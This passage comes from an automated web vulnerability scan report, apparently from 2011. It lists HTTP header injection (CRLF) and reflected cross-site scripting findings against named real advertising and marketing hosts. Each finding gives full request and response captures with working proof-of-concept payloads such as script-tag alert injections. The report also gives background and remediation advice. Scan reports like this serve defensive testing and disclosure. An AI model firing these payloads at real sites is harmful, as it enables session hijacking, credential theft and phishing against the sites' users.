Cookie: RlocalUID=tc%3D11090605095230846; NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 12:10:28 GMT
Server: Apache
Location: http://utdi.com/3b074
e845103065b
/partner-logos-avaya.jpg
Vary: Accept-Encoding
Content-Length: 311
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7445525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:35:21 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/3b074
e845103065b/partner-logo
...[SNIP]...

1.45. http://utdi.reachlocal.net/images/partner-logos-sonexis.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/partner-logos-sonexis.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d9d65%0d%0a27fb644bc97 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d9d65%0d%0a27fb644bc97/partner-logos-sonexis.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:17 GMT
Server: Apache
Location: http://utdi.com/d9d65
27fb644bc97
/partner-logos-sonexis.jpg
Vary: Accept-Encoding
Content-Length: 313
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7845525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:18:10 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d9d65
27fb644bc97/partner-logo
...[SNIP]...

1.46. http://utdi.reachlocal.net/images/productpic_avaya1.jpg [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/productpic_avaya1.jpg

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 36765%0d%0acd72234d30c was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /36765%0d%0acd72234d30c/productpic_avaya1.jpg HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:53:01 GMT
Server: Apache
Location: http://utdi.com/36765
cd72234d30c
/productpic_avaya1.jpg
Vary: Accept-Encoding
Content-Length: 309
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7945525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:54 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/36765
cd72234d30c/productpic_a
...[SNIP]...

1.47. http://utdi.reachlocal.net/images/spacer.gif [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://utdi.reachlocal.net
Path:   /images/spacer.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d288a%0d%0a00c7c1b4fe2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /d288a%0d%0a00c7c1b4fe2/spacer.gif HTTP/1.1
Host: utdi.reachlocal.net
Proxy-Connection: keep-alive
Referer: http://utdi.reachlocal.net/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RlocalUID=scid%3D2323693%26cid%3D837045%26tc%3D11090604520111271%26kw%3D233292%26clk%3D1315309925%26dynamic_proxy%3D1%26primary_serv%3Dutdi.reachlocal.net; RlocalPROXY=RLPROXY%3D; RlocalPROXYLog=RLPROXYLog%3d0; RlocalHilite=kw_hilite_off%3D0%26se_refer%3Dhttp%253A%252F%252Fwww.google.com%252Fsearch%253Fsourceid%253Dchrome%2526ie%253DUTF-8%2526q%253Dtelephone%252Bservice; RlocalTiming=landing_loadtime_off%3D0%26retarget_off%3D0%26track_landing_pages%3D1

Response

HTTP/1.1 302 Found
Date: Tue, 06 Sep 2011 11:52:49 GMT
Server: Apache
Location: http://utdi.com/d288a
00c7c1b4fe2
/spacer.gif
Vary: Accept-Encoding
Content-Length: 298
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_wt-vtb-qspyz-iuuq=ffffffff096d1a7745525d5f4f58455e445a4a423660;expires=Tue, 06-Sep-2011 12:17:42 GMT;path=/;httponly

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://utdi.com/d288a
00c7c1b4fe2/spacer.gif">
...[SNIP]...

2. Cross-site scripting (reflected)
There are 135 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences: input should be validated as strictly as possible on arrival, given the kind of content it is expected to contain, and user input should be HTML-encoded at any point where it is copied into application responses, so that HTML metacharacters such as < > " ' and = are replaced with the corresponding HTML entities.

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://ad.agkn.com/iframe!t=1129! [clk1 parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the clk1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1329d"><script>alert(1)</script>68ab14b7166 was submitted in the clk1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=3523644183486696711329d"><script>alert(1)</script>68ab14b7166&mt_id=126412&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:53 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKBAAAAAAkBArwBATUBC%2FABoAADAUIBBQABQwEFAAFBAQUAAQK8fhdn5xh1LAY%2FAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:53 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=3523644183486696711329d"><script>alert(1)</script>68ab14b7166&mt_id=126412&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=462918736?imid=1686570677704590911&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Cons
...[SNIP]...

2.2. http://ad.agkn.com/iframe!t=1129! [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the mt_adid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d3783"><script>alert(1)</script>e292a848299 was submitted in the mt_adid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060d3783"><script>alert(1)</script>e292a848299&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAA0BArwBATUBC%2FAB4AADAUIBBwABQwEHAAFBAQcAAQK8fhIojCjOb%2FrIAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060d3783"><script>alert(1)</script>e292a848299&redirect=http://ad.agkn.com/interaction!che=83841845?imid=1308449798641154760&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-
...[SNIP]...

2.3. http://ad.agkn.com/iframe!t=1129! [mt_id parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The value of the mt_id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c4a4"><script>alert(1)</script>52debf145d7 was submitted in the mt_id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=1264127c4a4"><script>alert(1)</script>52debf145d7&mt_adid=101060&redirect= HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:54 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKCAAAAAAsBArwBATUBC%2FABwAADAUIBBgABQwEGAAFBAQYAAQK8fniLvnViAKPrAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:54 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:53 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=1264127c4a4"><script>alert(1)</script>52debf145d7&mt_adid=101060&redirect=http://ad.agkn.com/interaction!che=2040497228?imid=8686245717678793707&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/
...[SNIP]...

2.4. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b84a"><script>alert(1)</script>edb5176eb5f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&9b84a"><script>alert(1)</script>edb5176eb5f=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D%26S%3D14445103%26Z%3D300x250%26_PVID%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%26_salt%3D1837163325%26cb%3D1315313124134052%26i%3D140469%26r%3D0,173ccec4-d886-11e0-a614-78e7d15f4cd0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uuid=OPTOUT

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: uuid=506135918787832435; Version=1; Domain=.agkn.com; Max-Age=157680000; Expires=Sun, 04-Sep-2016 12:45:55 GMT; Path=/
P3P: CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: u=6|0BEIV%2BNKDAAAAABEBArwBATUBC%2FAB8AADAUIBB4ABQwEHgAFBAQeAAQK8fjH%2FMgJ0ufACAAAAAAAAAyQAAAAAAAAL8AAAAAAAAAE1AmEAAA%3D%3D; Version=1; Domain=.agkn.com; Max-Age=63072000; Expires=Thu, 05-Sep-2013 12:45:55 GMT; Path=/
Cache-Control: max-age=0, must-revalidate
Pragma: no-cache
Expires: Thu, 1 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 12:45:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta ht
...[SNIP]...
<a href="http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&9b84a"><script>alert(1)</script>edb5176eb5f=1http://ad.agkn.com/interaction!che=1716110508?imid=3602653213049352194&ipid=804&caid=700&cgid=309&crid=3056&a=CLICK&adid=609&status=0&l=http://www.motorola.com/Consumers/US-EN/Consumer-Product-and-Se
...[SNIP]...

2.5. http://ad.agkn.com/iframe!t=1129! [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.agkn.com
Path:   /iframe!t=1129!

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bf115"%3balert(1)//760f2f14d5b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bf115";alert(1)//760f2f14d5b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /iframe!t=1129!?che=352364418348669671&e=x&clk1=http://pixel.mathtag.com/click/img?mt_aid=352364418348669671&mt_id=126412&mt_adid=101060&redirect=&bf115"%3balert(1)//760f2f14d5b=1 HTTP/1.1
Host: ad.agkn.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?VqUDAPKUGABuUqUAAAAAAKWdKAAAAAAAAgAAAAIAAAAAAP8AAAADCN0EHgAAAAAAuvUSAAAAAACAPjUAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC1JAIAAAAAAAIAAwAAAAAAyHa-nxovB0BmZmZmZmYQQMh2vp8aLwdAZmZmZmZmEEDIdr6fGi8HQGZmZmZmZhBAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADIcpieZfquClGnlVB5pUrT9u2-xRkxs4YU-KuXAAAAAA==,http%3A%2F%2Fglobal.ard.yahoo.com%2FSIG%3D15p48ptjt%2FM%3D787833.14445103.14291869.1659633%2FD%3Dmaps%2FS%3D2022332404%3ALREC%2FY%3DYAHOO%2FEXP%3D1315320324%2FL%3Dg5blw2KIKoTpARpjTl.wjQwLMhd7ak5mFeQAAUrL%2FB%3DihhvQUoGYno-%2FJ%3D1315313124134052%2FK%3DMkO1E30KWMQ9OU8J05I8pg%2FA%3D6261227%2FR%3D0%2F%2A%24,http%3A%2F%2Fmaps.yahoo.com%2Fdarla_fc%3Fcb%3Dyahoo.ads.darla._loaded%26p%3Dmaps%26f%3D2022332404%26l%3Dlrec%26en%3Dutf-8%26rn%3D1315331124066%26em%3D%257b%2522site-attribute%2522%253a%2522content%253dno_expandable%253bajax_cert_expandable%2522%252c%2522ad,B%3D10%26D%3Dzip%253D%2526ycg%253D%2526yyob%253D